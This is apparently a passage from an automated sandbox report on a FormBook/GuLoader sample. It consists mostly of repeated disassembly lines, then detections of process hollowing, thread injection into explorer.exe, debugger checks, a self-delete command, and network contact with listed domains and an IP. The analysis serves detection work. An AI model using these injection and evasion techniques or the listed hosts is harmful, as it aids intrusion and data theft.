Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9AD30 mov eax, dword ptr fs:[00000030h] 15_2_04F9AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h] 15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068CD6 mov eax, dword ptr fs:[00000030h] 15_2_05068CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov ecx, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 mov ecx, dword ptr fs:[00000030h] 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h] 15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h] 15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050514FB mov eax, dword ptr fs:[00000030h] 15_2_050514FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h] 15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h] 15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h] 15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h] 15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA76E2 mov eax, dword ptr fs:[00000030h] 15_2_04FA76E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2AE4 mov eax, dword ptr fs:[00000030h] 15_2_04FC2AE4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC16E0 mov ecx, dword ptr fs:[00000030h] 15_2_04FC16E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0505131B mov eax, dword ptr fs:[00000030h] 15_2_0505131B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC36CC mov eax, dword ptr fs:[00000030h] 15_2_04FC36CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2ACB mov eax, dword ptr fs:[00000030h] 15_2_04FC2ACB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD8EC7 mov eax, dword ptr fs:[00000030h] 15_2_04FD8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCFAB0 mov eax, dword ptr fs:[00000030h] 15_2_04FCFAB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h] 15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068B58 mov eax, dword ptr fs:[00000030h] 15_2_05068B58
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h] 15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h] 15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05068F6A mov eax, dword ptr fs:[00000030h] 15_2_05068F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0504D380 mov ecx, dword ptr fs:[00000030h] 15_2_0504D380
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD927A mov eax, dword ptr fs:[00000030h] 15_2_04FD927A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h] 15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_0505138A mov eax, dword ptr fs:[00000030h] 15_2_0505138A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h] 15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA766D mov eax, dword ptr fs:[00000030h] 15_2_04FA766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05065BA5 mov eax, dword ptr fs:[00000030h] 15_2_05065BA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h] 15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h] 15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h] 15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h] 15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h] 15_2_04FD4A2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h] 15_2_04FD4A2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9E620 mov eax, dword ptr fs:[00000030h] 15_2_04F9E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h] 15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h] 15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB3A1C mov eax, dword ptr fs:[00000030h] 15_2_04FB3A1C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov ecx, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h] 15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h] 15_2_04F9AA16
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BC135 LdrInitializeThunk, 0_2_022BC135

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.67.161.80 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\RYATPPETU.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: E90000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread register set: target process: 3472
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: explorer.exe, 0000000C.00000000.603358664.0000000005EA0000.00000004.00000001.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000C.00000000.572074802.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: RYATPPETU.exe PID: 2248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmmon32.exe PID: 5516, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY